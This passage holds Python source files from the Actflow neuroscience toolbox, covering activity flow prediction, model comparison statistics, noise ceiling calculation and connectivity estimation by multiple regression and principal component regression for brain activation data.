## nodewise_compthenavg - Compare-then-average cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if full_report or comparison_type=='nodewise_compthenavg':
#Test for accuracy of actflow prediction, separately for each subject ("compare-then-average")
nodewise_compthenavg_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='nodewise_compthenavg')
corr_nodewise_compthenavg_bycond = nodewise_compthenavg_output['corr_vals']
#Add to output dictionary
output.update({'nodewise_compthenavg_output':nodewise_compthenavg_output,
'corr_nodewise_compthenavg_bycond':nodewise_compthenavg_output['corr_vals'],
'R2_nodewise_compthenavg_bycond':nodewise_compthenavg_output['R2_vals'],
'mae_nodewise_compthenavg_bycond':nodewise_compthenavg_output['mae_vals']})
if model2_actvect is None:
## Test against null model
#Run t-tests to quantify cross-subject consistency, by condition, Pearson correlations
tval_ActflowPredAccCorr_bycond=np.zeros(nConds)
pval_ActflowPredAccCorr_bycond=np.zeros(nConds)
for condNum in range(nConds):
[tval_ActflowPredAccCorr_bycond[condNum],pval_ActflowPredAccCorr_bycond[condNum]] = scipy.stats.ttest_1samp(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum]),0.0)
#Grand mean (across task) t-test
[tval_ActflowPredAcc_condmean,pval_ActflowPredAcc_condmean] = scipy.stats.ttest_1samp(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond),axis=0),0.0)
else:
## Test model1 vs. model2 prediction accuracy
# Test for accuracy of MODEL2 actflow prediction, separately for each subject ("compare-then-average")
nodewise_compthenavg_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='nodewise_compthenavg')
corr_nodewise_compthenavg_bycond_model2 = nodewise_compthenavg_output_model2['corr_vals']
#Add to output dictionary
output.update({'nodewise_compthenavg_output_model2':nodewise_compthenavg_output_model2,
'corr_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['corr_vals'],
'R2_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['R2_vals'],
'mae_nodewise_compthenavg_bycond_model2':nodewise_compthenavg_output_model2['mae_vals']})
#Run t-tests to quantify cross-subject consistency, by condition, Pearson correlations
tval_ActflowPredAccCorr_Model1Vs2_bycond=np.zeros(nConds)
pval_ActflowPredAccCorr_Model1Vs2_bycond=np.zeros(nConds)
for condNum in range(nConds):
model1Vals=np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])
model2Vals=np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2[condNum])
[tval_ActflowPredAccCorr_Model1Vs2_bycond[condNum],pval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]] = scipy.stats.ttest_1samp(np.subtract(model1Vals,model2Vals),0.0)
#Grand mean (across nodes) t-test, model1 vs. model2 prediction accuracy
model1_means=np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond),axis=0)
model2_means=np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2),axis=0)
[tval_ActflowPredAcc_condmean,pval_ActflowPredAcc_condmean] = scipy.stats.ttest_1samp(np.subtract(model1_means,model2_means),0.0)
if print_report:
print(" ")
print("==Node-wise (spatial) correlations between predicted and actual activation patterns (calculated for each condition separetely):==")
print("--Compare-then-average (calculating prediction accuracies before cross-subject averaging):")
print("Each correlation based on N nodes: " + str(nNodes) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print("Cross-condition mean r=" + str("%.2f" % np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond))))) + ", t-value vs. 0: " + str("%.2f" % tval_ActflowPredAcc_condmean) + ", p-value vs. 0: " + str(pval_ActflowPredAcc_condmean))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])))) + ", t-value vs. 0: " + str("%.2f" % tval_ActflowPredAccCorr_bycond[condNum]) + ", p-value vs. 0: " + str(pval_ActflowPredAccCorr_bycond[condNum]))
else:
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond))))
print("Model1 mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2))))
print("Model2 mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
print("Model1 vs. Model2 T-value: " + str("%.2f" % tval_ActflowPredAcc_condmean) + ", p-value: " + str(pval_ActflowPredAcc_condmean))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
model1R=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond[condNum])))
model2R=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_compthenavg_bycond_model2[condNum])))
print("Condition " + str(condNum+1) + ": Model 1 r=" + str("%.2f" % model1R) + ", Model 2 r=" + str("%.2f" % model2R) + ", Model 1 vs. 2 R-value difference =" + str("%.2f" % np.subtract(model1R, model2R)) + ", t-value Model1 vs. Model2: " + str("%.2f" % tval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]) + ", p-value vs. 0: " + str(pval_ActflowPredAccCorr_Model1Vs2_bycond[condNum]))
## nodewise_avgthencomp - Average-then-compare cross-node correlation between predicted and actual activations (whole-brain activation patterns)
if avgthencomp_fixedeffects or comparison_type=='nodewise_avgthencomp':
#Test for accuracy of actflow predictions, after averaging across subjects ("average-then-compare")
nodewise_avgthencomp_output = model_compare_predicted_to_actual(target_actvect, model1_actvect, comparison_type='nodewise_avgthencomp')
corr_nodewise_avgthencomp_bycond = nodewise_avgthencomp_output['corr_nodewise_avgthencomp_bycond']
#Add to output dictionary
output.update({'nodewise_avgthencomp_output':nodewise_avgthencomp_output, 'corr_nodewise_avgthencomp_bycond':corr_nodewise_avgthencomp_bycond})
if model2_actvect is not None:
#Test for accuracy of actflow predictions, after averaging across subjects ("average-then-compare")
nodewise_avgthencomp_output_model2 = model_compare_predicted_to_actual(target_actvect, model2_actvect, comparison_type='nodewise_avgthencomp')
corr_nodewise_avgthencomp_bycond_model2 = nodewise_avgthencomp_output_model2['corr_nodewise_avgthencomp_bycond']
#Add to output dictionary
output.update({'nodewise_avgthencomp_output_model2':nodewise_avgthencomp_output_model2, 'corr_nodewise_avgthencomp_bycond_model2':corr_nodewise_avgthencomp_bycond_model2})
if print_report:
print(" ")
print("==Node-wise (spatial) correlations between predicted and actual activation patterns (calculated for each condition separetely):==")
print("--Average-then-compare (calculating prediction accuracies after cross-subject averaging):")
print("Each correlation based on N nodes: " + str(nNodes) + ", p-values based on N subjects (cross-subject variance in correlations): " + str(nSubjs))
if model2_actvect is None:
print("Mean r=" + str("%.2f" % np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond)))))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond[condNum]))
else:
model1MeanR=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond)))
model2MeanR=np.tanh(np.nanmean(np.ma.arctanh(corr_nodewise_avgthencomp_bycond_model2)))
print("Mean Model1 r=" + str("%.2f" % model1MeanR))
print("Mean Model2 r=" + str("%.2f" % model2MeanR))
print("Mean Model1 vs. Model2 R-value difference=" + str("%.2f" % (model1MeanR - model2MeanR)))
if print_by_condition:
print("By task condition:")
for condNum in range(nConds):
print("Condition " + str(condNum+1) + ": Model1 r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond[condNum]) + ", Model2 r=" + str("%.2f" % corr_nodewise_avgthencomp_bycond_model2[condNum]) + ", Model 1 vs. Model2 R-value difference=" + str("%.2f" % np.subtract(corr_nodewise_avgthencomp_bycond[condNum], corr_nodewise_avgthencomp_bycond_model2[condNum])))
return output
def print_comparison_results(comparison_output, comparison_output_model2, tvals, pvals, scaling_note=""):
if comparison_output_model2 is None:
print(" ")
print("Mean Pearson r = " + str("%.2f" % np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output['corr_vals']))))) + ", t-value vs. 0: " + str("%.2f" % tvals) + ", p-value vs. 0: " + str(pvals))
print(" ")
print("Mean % variance explained (R^2 score, coeff. of determination) = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['R2_vals']))))
print(" ")
print("Mean MAE (mean absolute error) = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['mae_vals']))))
print(" ")
print(scaling_note)
else:
print(" ")
meanRModel1=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output['corr_vals']))))
print("Model1 mean Pearson r=" + str("%.2f" % meanRModel1))
meanRModel2=np.tanh(np.nanmean(np.nanmean(np.ma.arctanh(comparison_output_model2['corr_vals']))))
print("Model2 mean Pearson r=" + str("%.2f" % meanRModel2))
meanRModelDiff=meanRModel1-meanRModel2
print("R-value difference = " + str("%.2f" % meanRModelDiff))
print("Model1 vs. Model2 T-value: " + str("%.2f" % tvals) + ", p-value: " + str(pvals))
print(" ")
meanR2Model1 = np.nanmean(np.nanmean(comparison_output['R2_vals']))
print("Model1 mean % predicted variance explained R^2=" + str("%.2f" % meanR2Model1))
meanR2Model2 = np.nanmean(np.nanmean(comparison_output_model2['R2_vals']))
print("Model2 mean % predicted variance explained R^2=" + str("%.2f" % meanR2Model2))
meanR2ModelDiff=meanR2Model1-meanR2Model2
print("R^2 difference = " + str("%.2f" % meanR2ModelDiff))
print(" ")
print("Model1 mean MAE = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output['mae_vals']))))
print("Model2 mean MAE = " + str("%.2f" % np.nanmean(np.nanmean(comparison_output_model2['mae_vals']))))
print("Model1 vs. Model2 mean MAE difference = " + str("%.2f" % np.subtract(np.nanmean(np.nanmean(comparison_output['mae_vals'])), np.nanmean(np.nanmean(comparison_output_model2['mae_vals'])))))
print(" ")
print(scaling_note) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/model_compare/model_compare.py | model_compare.py |
import numpy as np
def actflowcalc(actVect, fcMat, separate_activations_bytarget=False, transfer_func=None):
"""
Function to run activity flow mapping algorithm
actVect: node vector with activation values
    fcMat: node x node matrix with connectivity values
separate_activations_bytarget: indicates if the input actVect matrix has a separate activation vector for each target (to-be-predicted) node (e.g., for the locally-non-circular approach)
transfer_func: The transfer function to apply to the outputs of all source regions. Assumes observed time series are primarily driven by inputs (e.g., local field potentials), such that the source time series need to be converted from inputs to outputs via a transfer function. Default is 'None', which specifies a linear transfer function wherein the output is the same as the input.
"""
numRegions=np.shape(actVect)[0]
actPredVector=np.zeros((numRegions,))
if transfer_func is None:
if separate_activations_bytarget:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
actPredVector[heldOutRegion]=np.sum(actVect[heldOutRegion,otherRegions]*fcMat[heldOutRegion,otherRegions])
else:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
actPredVector[heldOutRegion]=np.sum(actVect[otherRegions]*fcMat[heldOutRegion,otherRegions])
return actPredVector
else:
if separate_activations_bytarget:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
inputActVect=transfer_function(actVect[heldOutRegion,otherRegions],transfer_func=transfer_func)
actPredVector[heldOutRegion]=np.sum(inputActVect*fcMat[heldOutRegion,otherRegions])
else:
for heldOutRegion in range(numRegions):
otherRegions=list(range(numRegions))
otherRegions.remove(heldOutRegion)
inputActVect=transfer_function(actVect[otherRegions],transfer_func=transfer_func)
actPredVector[heldOutRegion]=np.sum(inputActVect*fcMat[heldOutRegion,otherRegions])
return actPredVector
#Define input transfer function
def transfer_function(activity, transfer_func='linear', threshold=0, a=1):
if transfer_func == 'linear':
return activity
elif transfer_func == 'relu':
return activity*(activity>threshold)
elif transfer_func == 'sigmoid':
return 1 / (1 + np.exp(-activity))
elif transfer_func == 'logit':
return (1/a)*np.log(activity/(1-activity)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/actflowcomp/actflowcalc.py | actflowcalc.py |
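# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary node count), guarded so
# it only runs when this file is executed directly. It simply shows the expected
# input/output shapes of actflowcalc() with the default linear transfer function.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    nnodes = 10
    act_vector = rng.standard_normal(nnodes)            # node activation vector
    fc_matrix = rng.standard_normal((nnodes, nnodes))    # node x node connectivity estimates
    np.fill_diagonal(fc_matrix, 0)                        # no self-connections
    predicted = actflowcalc(act_vector, fc_matrix)
    print(predicted.shape)                                # -> (10,)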
import numpy as np
import scipy.stats
from ..model_compare import *
def noiseceilingcalc(actvect_group_first, actvect_group_second, full_report=False, print_report=True, reliability_type='conditionwise_compthenavgthen', avgthencomp_fixedeffects=False):
"""
Function to calculate the repeat reliability of the data in various ways. This is equivalent to calculating the "noise ceiling" for predictive models (such as encoding models like activity flow models), which identifies theoretical limits on the highest prediction accuracy (based on the assumption that the data predicting itself is the highest possible prediction accuracy).
Note that incorporation of spontaneous activity to predict task-evoked activity might allow for predictions above the noise ceiling (since spontaneous activity is considered "noise" with the noise ceiling approach).
INPUTS
actvect_group_first: node x condition x subject matrix with activation values. This should be distinct data from actvect_group_second (ideally identical in all ways, except a repetition of data collection at a different time)
actvect_group_second: node x condition x subject matrix with activation values. This should be distinct data from actvect_group_first (ideally identical in all ways, except a repetition of data collection at a different time)
full_report: Calculate full report with all reliability types
print_report: Print the reliability report to screen
reliability_type: The kind of reliability to calculate (when full_report=False). Options are:
conditionwise_compthenavgthen - Compare-then-average condition-wise correlation between repetitions. This is run separately for each node, computing the correlation between the activations across conditions (which characterizes each node's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging.
conditionwise_avgthencomp - Average-then-compare condition-wise correlation between repetitions. This is run separately for each node, computing the correlation between the cross-condition activation patterns (which characterizes each node's response profile). Activations are averaged across subjects prior to comparison (sometimes called a "fixed effects" analysis), boosting signal-to-noise ratio but likely reducing dimensionality (through inter-subject averaging) and reducing the ability to assess the consistency of the result across subjects relative to compare-then-average.
nodewise_compthenavg - Compare-then-average cross-node correlation between repetitions (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed separately for each subject, then results are summarized via averaging (sometimes called a "random effects" analysis).
nodewise_avgthencomp - Average-then-compare cross-node correlation between repetitions (whole-brain activation patterns). This is run separately for each condition, computing the correlation between the cross-node activation patterns (which characterizes each condition's response profile). The comparisons are computed after averaging across subjects (sometimes called a "fixed effects" analysis).
[TODO: subjwise_compthenavg (each node & condition based on individual differences)]
OUTPUT
output: a dictionary containing different variables depending on user input for full_report & reliability_type.
See documentation for model_compare function for details.
USAGE EXAMPLES
[TODO: Update usage examples]
import noiseceilingcalc as nc
    output = nc.noiseceilingcalc(actvect_group_first, actvect_group_second, full_report=False, print_report=True, reliability_type='conditionwise_compthenavgthen')
print('Noise ceiling variables available: ',list(output)) # will show all variables available from this usage of nc; in this case it will contain 2 variables corresponding to conditionwise_compthenavgthen (1 matrix of r values, 1 grand mean r value)
noiseCeilVal = output['repeat_corr_conditionwise_compthenavg_bynode_meanR'] # access the variable containing the grand mean r and assign it to be the noise ceiling metric for this model
import noiseceilingcalc as nc
    output = nc.noiseceilingcalc(actvect_group_first, actvect_group_second, full_report=True, print_report=True)
print('Noise ceiling variables available: ',list(output)) # will show all variables available from this usage of nc; in this case it will contain all 7 results (because full_report=True)
noiseCeilVal = output['repeat_corr_nodewise_avgthencomp'] # an example of accessing the r value associated with 'nodewise_avgthencomp'
"""
model_compare_output = model_compare(target_actvect=actvect_group_second, model1_actvect=actvect_group_first, model2_actvect=None, full_report=full_report, print_report=print_report, avgthencomp_fixedeffects=avgthencomp_fixedeffects)
return model_compare_output | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/actflowcomp/noiseceilingcalc.py | noiseceilingcalc.py |
from sklearn.linear_model import LinearRegression
from sklearn.decomposition import PCA
from sklearn.model_selection import cross_val_predict
from sklearn.metrics import mean_squared_error, r2_score
import numpy as np
def pc_multregconn(activity_matrix, target_ts=None, n_components=None, n_comp_search=False, n_components_min=1, n_components_max=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
n_components: Optional. Number of PCA components to use. If None, the smaller of number of nodes or number of time points (minus 1) will be selected.
n_comp_search: Optional. Boolean indicating whether to search for the best number of components based on cross-validation generalization (to reduce overfitting).
n_components_min: Optional. The smallest number to test in the n_comp_search.
n_components_max: Optional. The largest number to test in the n_comp_search.
Output: connectivity_mat (formatted targets X sources), n_components
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
    if n_components is None:
n_components = np.min([nnodes-1, timepoints-1])
else:
if nnodes<n_components or timepoints<n_components:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More components than nodes and/or timepoints! Use fewer components')
#De-mean time series
activity_matrix_mean = np.mean(activity_matrix,axis=1)
activity_matrix = activity_matrix - activity_matrix_mean[:, np.newaxis]
if target_ts is None:
#Cross-validation to find optimal number of components (based on mean MSE across all nodes)
if n_comp_search:
if n_components_max is None:
n_components_max = np.min([nnodes-1, timepoints-1])
componentnum_set=np.arange(n_components_min,n_components_max+1)
mse_regionbycomp = np.zeros([np.shape(componentnum_set)[0],nnodes])
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Run PCA
pca = PCA()
Xreg_allPCs = pca.fit_transform(X)
mscv_vals=np.zeros(np.shape(componentnum_set)[0])
comp_count=0
for comp_num in componentnum_set:
regr = LinearRegression()
Xreg = Xreg_allPCs[:,:comp_num]
regr.fit(Xreg, y)
# Cross-validation
y_cv = cross_val_predict(regr, Xreg, y, cv=10)
mscv_vals[comp_count] = mean_squared_error(y, y_cv)
comp_count=comp_count+1
mse_regionbycomp[:,targetnode] = mscv_vals
min_comps_means = np.mean(mse_regionbycomp, axis=1)
n_components=componentnum_set[np.where(min_comps_means==np.min(min_comps_means))[0][0]]
print('n_components = ' + str(n_components))
connectivity_mat = np.zeros((nnodes,nnodes))
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Run PCA on source time series
pca = PCA(n_components)
reduced_mat = pca.fit_transform(X) # Time X Features
components = pca.components_
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
regrmodel = LinearRegression()
reg = regrmodel.fit(reduced_mat, y)
#Convert regression betas from component space to node space
betasPCR = pca.inverse_transform(reg.coef_)
connectivity_mat[targetnode,othernodes]=betasPCR
else:
#Remove time series mean
target_ts = target_ts - np.mean(target_ts)
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Cross-validation to find optimal number of components
if n_comp_search:
            if n_components_max is None:
                n_components_max = np.min([nnodes-1, timepoints-1])
            componentnum_set=np.arange(n_components_min,n_components_max+1)
mscv_vals=np.zeros(np.shape(componentnum_set)[0])
comp_count=0
for comp_num in componentnum_set:
mscv_vals[comp_count] = pcr_cvtest(X,y, pc=comp_num, cv=10)
comp_count=comp_count+1
n_components=componentnum_set[np.where(mscv_vals==np.min(mscv_vals))[0][0]]
#Run PCA on source time series
pca = PCA(n_components)
reduced_mat = pca.fit_transform(X) # Time X Features
components = pca.components_
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(reduced_mat, y)
#Convert regression betas from component space to node space
betasPCR = pca.inverse_transform(reg.coef_)
connectivity_mat=betasPCR
return connectivity_mat
def pcr_cvtest(X,y,pc,cv):
''' Principal Component Regression in Python'''
''' Based on code from here: https://nirpyresearch.com/principal-component-regression-python/'''
''' Step 1: PCA on input data'''
# Define the PCA object
pca = PCA()
# Run PCA producing the reduced variable Xred and select the first pc components
Xreg = pca.fit_transform(X)[:,:pc]
''' Step 2: regression on selected principal components'''
# Create linear regression object
regr = LinearRegression()
# Fit
regr.fit(Xreg, y)
# Calibration
#y_c = regr.predict(Xreg)
# Cross-validation
y_cv = cross_val_predict(regr, Xreg, y, cv=cv)
# Calculate mean square error for calibration and cross validation
#mse_c = mean_squared_error(y, y_c)
mse_cv = mean_squared_error(y, y_cv)
#return(y_cv, mse_c, mse_cv)
return(mse_cv) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/pc_multregconn.py | pc_multregconn.py |
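# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary dimensions; more
# timepoints than nodes), showing the expected input/output shapes of
# pc_multregconn() with the default number of components.
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    nnodes, ntimepoints = 8, 60
    ts_data = rng.standard_normal((nnodes, ntimepoints))   # nodes x time
    fc = pc_multregconn(ts_data)
    print(fc.shape)                                          # -> (8, 8), targets x sources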
from sklearn.linear_model import LinearRegression
#from ..tools import regression
import numpy as np
def multregconn(activity_matrix, target_ts=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
Output: connectivity_mat, formatted targets X sources
"""
nnodes = activity_matrix.shape[0]
timepoints = activity_matrix.shape[1]
if nnodes > timepoints:
print('activity_matrix shape: ',np.shape(activity_matrix))
raise Exception('More nodes (regressors) than timepoints! Use regularized regression')
if target_ts is None:
connectivity_mat = np.zeros((nnodes,nnodes))
for targetnode in range(nnodes):
othernodes = list(range(nnodes))
othernodes.remove(targetnode) # Remove target node from 'other nodes'
X = activity_matrix[othernodes,:].T
y = activity_matrix[targetnode,:]
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat[targetnode,othernodes]=reg.coef_
# run multiple regression, and add constant
#beta_fc,resids = regression.regression(y,X,alpha=0, constant=True) # increase alpha if want to apply a ridge penalty
#connectivity_mat[targetnode,othernodes] = beta_fc[1:] # exclude 1st coef; first coef is beta_0 (or mean)
else:
#Computing values for a single target node
connectivity_mat = np.zeros((nnodes,1))
X = activity_matrix.T
y = target_ts
#Note: LinearRegression fits intercept by default (intercept beta not included in coef_ output)
reg = LinearRegression().fit(X, y)
connectivity_mat=reg.coef_
# run multiple regression, and add constant
#beta_fc,resids = regression.regression(y,X,alpha=0, constant=True) # increase alpha if want to apply a ridge penalty
#connectivity_mat = beta_fc[1:] # exclude 1st coef; first coef is beta_0 (or mean)
return connectivity_mat
def logit(x,a=1):
return (1/a)*np.log(x/(1-x)) | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/multregconn.py | multregconn.py |
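# ---------------------------------------------------------------------------
# Illustrative usage sketch with random data (arbitrary dimensions; more
# timepoints than nodes, as required above). Shows both the full-matrix and the
# single-target usage of multregconn().
if __name__ == '__main__':
    rng = np.random.default_rng(0)
    nnodes, ntimepoints = 8, 60
    ts_data = rng.standard_normal((nnodes, ntimepoints))       # nodes x time
    fc = multregconn(ts_data)
    print(fc.shape)                                              # -> (8, 8), targets x sources
    target = rng.standard_normal(ntimepoints)                    # a single target time series
    fc_to_target = multregconn(ts_data, target_ts=target)
    print(fc_to_target.shape)                                    # -> (8,), betas from each source node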
import numpy as np
import nibabel as nib
import h5py
import os
import pkg_resources
dilateMM = 10
partitiondir = pkg_resources.resource_filename('ActflowToolbox.dependencies', 'ColeAnticevicNetPartition/')
defaultdlabelfile = partitiondir + 'CortexSubcortex_ColeAnticevic_NetPartition_wSubcorGSR_parcels_LR.dlabel.nii'
dilatedmaskdir = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/CIFTIMasks/')
# maskdir cortex
dilatedmaskdir_cortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'Glasser2016/surfaceMasks/')
# maskdir subcortex
dilatedmaskdir_subcortex = pkg_resources.resource_filename('ActflowToolbox.network_definitions', 'CAB-NP/volumeMasks/')
def calcactivity_parcelwise_noncircular_surface(data, dlabelfile=defaultdlabelfile, dilated_parcels=True,subcortex=False, verbose=False):
"""
This function produces a parcel-to-parcel activity (GLM beta) matrix while excluding vertices in the neighborhood of a given target parcel.
Excludes all vertices within a 10mm (default) dilated mask of the target parcel when computing parcel-level mean activity.
Takes in vertex-wise data and generates a parcelA X parcelB activity matrix, with parcelA being the to-be-predicted 'target' and parcelB being the 'source'
Currently only works for surface-based cortex data
PARAMETERS:
data : vertex-wise data... vertices x conditions; default assumes that data is 96k dense array
dlabelfile : parcellation file; each vertex indicates the number corresponding to each parcel. dlabelfile needs to match same vertex dimensions of data
dilated_parcels : If True, will exclude vertices within 10mm of a target parcel's borders when computing mult regression fc (reducing spatial autocorrelation inflation)
subcortex : If True, will include subcortical volume rois from the CAB-NP
verbose : indicate if additional print commands should be used to update user on progress
RETURNS:
activation_matrix : Target X Source activity Matrix. Sources-to-target mappings are organized as rows (targets) from each column (source)
"""
if subcortex is False:
nparcels = 360
else:
nparcels = 718
# Load dlabel file (cifti)
if verbose: print('Loading in CIFTI dlabel file')
dlabels = np.squeeze(nib.load(dlabelfile).get_data())
# Find and sort unique parcels
unique_parcels = np.sort(np.unique(dlabels))
# Only include cortex
unique_parcels = unique_parcels[:nparcels]
# Instantiate empty activation matrix for regular mean time series
regular_activation_matrix = np.zeros((nparcels,data.shape[1]))
regular_activation_computed = np.zeros((nparcels,1))
# Instantiate empty activation matrix
activation_matrix = np.zeros((nparcels,nparcels,data.shape[1]))
for parcelInt,parcel in enumerate(unique_parcels):
# setup cortex/subcortex definitions
if parcelInt < 360:
dilatedmaskdir = dilatedmaskdir_cortex
atlas_label = 'Glasser'
else:
dilatedmaskdir = dilatedmaskdir_subcortex
atlas_label = 'Cabnp'
if verbose: print('Computing activations for target parcel', int(parcel))
# Find where this parcel is in the unique parcel array
parcel_ind = np.where(unique_parcels==parcel)[0]
# Load in mask for target parcel
if dilated_parcels:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir+ atlas_label + 'Parcel' + str(int(parcel)) + '_dilated_10mm.dscalar.nii').get_data())
else:
parcel_mask = np.squeeze(nib.load(dilatedmaskdir+ atlas_label + 'Parcel' + str(int(parcel)) + '.dscalar.nii').get_data())
# get all target ROI indices
target_ind = np.where(dlabels==parcel)[0] # Find target parcel indices (from dlabel file)
#target_ind = np.squeeze(nib.load(dilatedmaskdir+'GlasserParcel' + str(int(parcel)) + '.dscalar.nii').get_data())
#target_ind = np.asarray(target_ind,dtype=bool)
# remove target parcel's (potentially dilated) mask from set of possible source vertices
mask_ind = np.where(parcel_mask==1.0)[0] # find mask indices
source_indices = dlabels.copy() # copy the original parcellation dlabel file
source_indices[mask_ind] = 0 # modify original dlabel file to remove any vertices that are in the mask
# Identify all 'source' parcels to include when computing FC
source_parcels = np.delete(unique_parcels, parcel_ind)
# Now compute mean activations of each ROI using modified dlabel file after removing target parcel's mask (ie source_indices)
source_parcel_ts = np.zeros((len(source_parcels),data.shape[1])) # source regions X time matrix
        empty_source_row = [] # empty array to keep track of the row index of any sources that might be excluded
i = 0
for source in source_parcels:
source_ind = np.where(source_indices==source)[0] # Find source parcel indices (from modified dlabel file)
sourceInt = np.where(unique_parcels==source)[0]
#Determine if this source parcel was modified (if not, then use standard time series)
source_ind_orig = np.where(dlabels==source)[0]
if np.array_equal(source_ind,source_ind_orig):
if regular_activation_computed[sourceInt]:
source_parcel_ts[i,:] = regular_activation_matrix[sourceInt,:]
else:
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
#Save time series for future use
regular_activation_matrix[sourceInt,:] = source_parcel_ts[i,:].copy()
regular_activation_computed[sourceInt] = True
else:
# If the entire parcel is excluded (i.e, the time series is all 0s), then skip computing the mean for this parcel
if len(source_ind)==0:
empty_source_row.append(i) # if this source is empty, remember its row (to delete it from the regressor matrix later)
i += 1
# Go to next source parcel
continue
source_parcel_ts[i,:] = np.nanmean(np.real(data[source_ind,:]),axis=0) # compute averaged time series of source parcel
i += 1
# Delete source regions that have been entirely excluded from the source_parcels due to the dilation
if len(empty_source_row)>0:
source_parcel_ts = np.delete(source_parcel_ts,empty_source_row,axis=0) # delete all ROIs with all 0s
source_parcels = np.delete(source_parcels,empty_source_row,axis=0) # Delete the 0-variance ROI from the list of sources
# compute averaged time series of TARGET
if regular_activation_computed[parcelInt]:
target_parcel_ts = regular_activation_matrix[parcelInt,:]
else:
target_parcel_ts = np.nanmean(np.real(data[target_ind,:]),axis=0)
#Save time series for future use
regular_activation_matrix[parcelInt,:] = target_parcel_ts.copy()
regular_activation_computed[parcelInt] = True
# Find matrix indices for all source parcels
source_cols = np.where(np.in1d(unique_parcels,source_parcels))[0]
target_row = parcelInt
activation_matrix[target_row,source_cols,:] = source_parcel_ts
activation_matrix[target_row,target_row,:] = target_parcel_ts
return activation_matrix | Actflow | /Actflow-0.2.3.1-py3-none-any.whl/connectivity_estimation/calcactivity_parcelwise_noncircular_surface.py | calcactivity_parcelwise_noncircular_surface.py |
from scipy import linalg
from sklearn.covariance import EmpiricalCovariance,LedoitWolf
from sklearn.linear_model import LinearRegression
import numpy as np
def partial_corrconn(activity_matrix,estimator='EmpiricalCovariance', target_ts=None):
"""
activity_matrix: Activity matrix should be nodes X time
target_ts: Optional, used when only a single target time series (returns 1 X nnodes matrix)
